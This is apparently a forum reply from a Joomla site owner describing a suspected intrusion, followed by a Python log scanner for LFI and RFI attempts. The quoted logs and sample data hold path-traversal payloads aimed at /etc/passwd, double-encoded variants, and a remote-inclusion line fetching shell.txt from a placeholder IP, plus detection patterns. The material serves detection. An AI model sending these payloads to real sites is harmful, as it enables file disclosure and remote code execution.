Thanks for looking into this, here is a long reply:
0) if you haven't yet, review the CERT intruder detection checklist for your platform.
I am using a host, so I don't think I can get access to this.
1) what type of system were you running, Linux, Windows, Mac?
The operating system is Linux.
1A) what distribution or version? 1B) what revision or patch level? 1C) what is the version and patch level of your web server, and content manager?
Apache version 2.2.15
PHP version 5.2.13
MySQL version 5.0.91-community
[I got the above from Cpanel]
1D) what other server applications do you have installed, e.g. what database and version.
A second Joomla install
Several static HTML sites [web pages]
A couple of other PHP applications [phpurl - two of these], a PHP helpdesk tool [osTicket]
2) what evidence do you have of the intrusion. Specifically, what do you have that you could use to show someone that the events in question actually took place.
Joomla has a number of plug-ins. One of these [Marco's interceptor warning] sends an email to me when it detects things like attempted SQL injections. On this occasion, I received multiple emails indicating multiple attempts.
This is part of one of the emails:
** Local File Inclusion [GET]
[option] => /../../../../../../../../../../etc/passwd
** Local File Inclusion [REQUEST]
[option] => /../../../../../../../../../../etc/passwd
**PAGE / SERVER INFO
*REMOTE_ADDR :
xx.xxx.xxx.xx
*HTTP_USER_AGENT :
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20)
*REQUEST_METHOD :
GET
*QUERY_STRING :
Itemid=1&catid=1:latest-news&id=xxxx:title-of-article-theywere-targetting-&option=/../../../../../../../../../../etc/passwd&view=article
So far, all of these attempts have failed because, as advised by Joomla, I have the latest version [1.5.22] and keep an eye on their list of problem extensions and plug-ins.
As usual, I banned the IP address of the culprit and, for the time being, forgot about it.
These attempted 'SQL injections' are comparatively rare on this site because they usually come from China, Russia, etc. Most of these countries are banned by another Joomla plugin. Sites that are reported by Marco's interceptor are banned using the cPanel IP Deny Manager. The IP range is also banned - not just the IP itself.
It is only with hindsight that I have realized that problems on this Joomla install and other problems with other sites on the server all started after this 'attack'.
3) How much, if anything have you done to this system since the incident. Note, the less, the better.
Although a lot has been done since the attack [March 2], in actual fact it is mostly just the addition of articles & photos to the affected Joomla site.
However, again with hindsight, it was when using the Joomla install function that things usually went badly. Firstly, the Akeeba backup facility would not work, saying that it could not find directories. In an attempt to fix this I upgraded Akeeba, only to result in the site playing up and eventually crashing. I resorted to getting the host to use a backup to restore the site. Akeeba still would not work, so I ignored it as the rest of the site seemed okay.
Subsequently, I was installing a search plug-in and again things went wrong, and the host had to use an even older backup to restore the site.
So, with hindsight, it is the Joomla installer which seems to crash the site. However, the reason the installer is being used is because something is malfunctioning, causing one to want to upgrade or remove a plugin or component.
The site at the moment seems to be fine, but I believe that a fault will appear and things will get worse and worse. If an attempt to make repairs is made by e.g. removing a plug-in or doing an SQL DB repair, this will result in losing the site.
If I could do the equivalent of a system restore, I would use a backup I have from October 2010. But, because this is a news and information site, I would lose 6 months of news!
At present, I am barely touching the site to avoid it crashing and to see if I can spot a sequence of events that causes it to fail. Again, because it's a news site, this is leading to complaints that we're not running stories we've been given.
After it dawned on me when the troubles began, I went to the raw access logs. Because we're still in March, I got the info - up until now, we were not archiving the logs.
This was their first visit:
xxx.xxx.xxx.xx - - [02/Mar/2011:10:40:20 -0500] "GET index.php?option= HTTP/1.0" 404 1390 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20)"
I don’t know what this indicates: index.php?option=
They then went on to do stuff like this:
xxx.xxx.xxx.xx - [02/Mar/2011:10:47:46 -0500] "GET /index.php?Itemid=1&catid=1:latest-news&id=/../../../../../../../../../../etc/passwd&option=com_content
After checking what they had done on the web [searching terms like used above] I believe they succeeded in a RFI or LFI injection.
But, I don't know exactly what they did [eg if they changed a file - what file did they change?]
4) If it isn't too late, put a firewall in front of the system or pull the network plug.
As this is a hosted server, I can't do that.
What I have done is use a commercial plug-in that claims to stop such attacks. The log for this plugin and the system's log do not work [another problem?!]
Do as little as possible while you investigate.
Apart from the odd article and test, this is what I'm doing.
5) how did you track the perpetrator.
As above, this was gleaned from the warning details and the logs.
Using on-line tools such as ipwhois, reverse lookup etc I was amazed to find the perpetrator is in the same country as me, using a fixed ip. On the same dedicated server he has his own website. This is a commercial company providing news & info [the same as us but in another area].
Document, but don't try to reverse-crack their system.
-I would love to be able to reverse-crack their system
Obtain the who-is and responsible party information. If you have enough information, my advice would be to contact the authorities.
I have. One police department refused to act.
The second [where the attacker is] are 'looking into it'
I was hoping to be able to say to the police 'do x, y and z' when the other party says 'no, we didn't do it'.
The first police officer said ‘it could be a spoofed ip’. My feeling is that this is not the case.
Your ISP may be in a position to help you in this regard.
I don't think so; it would be the host, who is only interested in providing the service.
I have no way of saying whether the site is definitely damaged or not. Despite the work that has gone into the site, if it crashes again it will have to be abandoned.
Because of the nature of our site a mainstream broadcaster wants to cover the story but can't because the police are investigating.
I have been told that, if I run a story to the effect of 'this is why the site is going or has been damaged xxx did it'- they'll sue me.
PS: I can send you our site URL and the IP of the attacker if required.
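The post above reads the raw access logs by eye for the `../../etc/passwd` pattern. As an added example (not part of this post, and not code from Joomla, Marco's interceptor or any other plugin mentioned), here is a small Python scanner that parses Apache combined-format log lines, percent-decodes each query parameter (including the double-encoded `%252e` form that a single-pass filter misses), and tags parameters carrying a local-file traversal or a remote URL. The log lines in it are constructed in the shape of the post's excerpt; the IP addresses are documentation addresses, not the real attacker, and the status codes and sizes are made up.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache combined log format. The request target is taken as-is because, as in the
# post's first log line, it may lack the leading "/".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?" '
    r'(?P<status>\d{3}) \S+(?: "[^"]*" "(?P<ua>[^"]*)")?'
)

TRAVERSAL_RE = re.compile(r'\.\.[/\\]')                                  # ../ or ..\
SENSITIVE_RE = re.compile(r'/etc/(?:passwd|shadow)|/proc/self/environ|php://', re.I)
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.I)                      # value is itself a URL

def normalize(value, extra_passes=2):
    """parse_qsl has already percent-decoded once; decode again so a double-encoded
    traversal (%252e%252e%252f) is seen as ../ instead of slipping past the regexes."""
    for _ in range(extra_passes):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(value):
    """Return (normalized value, list of tags) for one query parameter value."""
    v = normalize(value)
    tags = []
    if TRAVERSAL_RE.search(v) or SENSITIVE_RE.search(v):
        tags.append("LFI")
    if REMOTE_RE.search(v):
        tags.append("RFI")
    return v, tags

def scan_line(line):
    """Return a hit dict for a suspicious request, or None for a clean/unparseable line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = urlsplit(m.group("target")).query
    findings = []
    for name, raw in parse_qsl(query, keep_blank_values=True):
        value, tags = classify(raw)
        if tags:
            findings.append((name, value, tags))
    if not findings:
        return None
    return {"ip": m.group("ip"), "ts": m.group("ts"),
            "status": int(m.group("status")), "findings": findings}

def scan_log(lines):
    return [h for h in map(scan_line, lines) if h]

def summarize(hits):
    """Suspicious requests per source IP: the number to put in front of a ban decision."""
    return dict(Counter(h["ip"] for h in hits))

# Constructed sample lines in the shape of the post's log excerpt (hypothetical data).
SAMPLE_LOG = [
    '192.0.2.10 - - [02/Mar/2011:10:38:05 -0500] "GET /index.php?option=com_content&view=article&id=12 HTTP/1.1" 200 5321 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [02/Mar/2011:10:40:20 -0500] "GET index.php?option= HTTP/1.0" 404 1390 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20)"',
    '198.51.100.7 - - [02/Mar/2011:10:47:46 -0500] "GET /index.php?Itemid=1&catid=1:latest-news&id=/../../../../../../../../../../etc/passwd&option=com_content HTTP/1.0" 200 1390 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20)"',
    '198.51.100.7 - - [02/Mar/2011:10:48:02 -0500] "GET /index.php?option=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.0" 200 1390 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [02/Mar/2011:10:49:10 -0500] "GET /index.php?option=http://203.0.113.5/shell.txt? HTTP/1.0" 200 1390 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for h in hits:
        print(h["ip"], h["ts"], h["status"], h["findings"])
    print(summarize(hits))
```

The empty `option=` probe from the post's first log line is parsed but not flagged on its own; it only becomes interesting because the same source goes on to send the traversal payloads, which is what the per-IP count in `summarize` is meant to surface. Run it over a real log with `scan_log(open("access_log"))`; the status column in each hit tells you whether the traversal request got a 200 rather than a 404, which is the first thing to check when deciding whether an attempt may have succeeded.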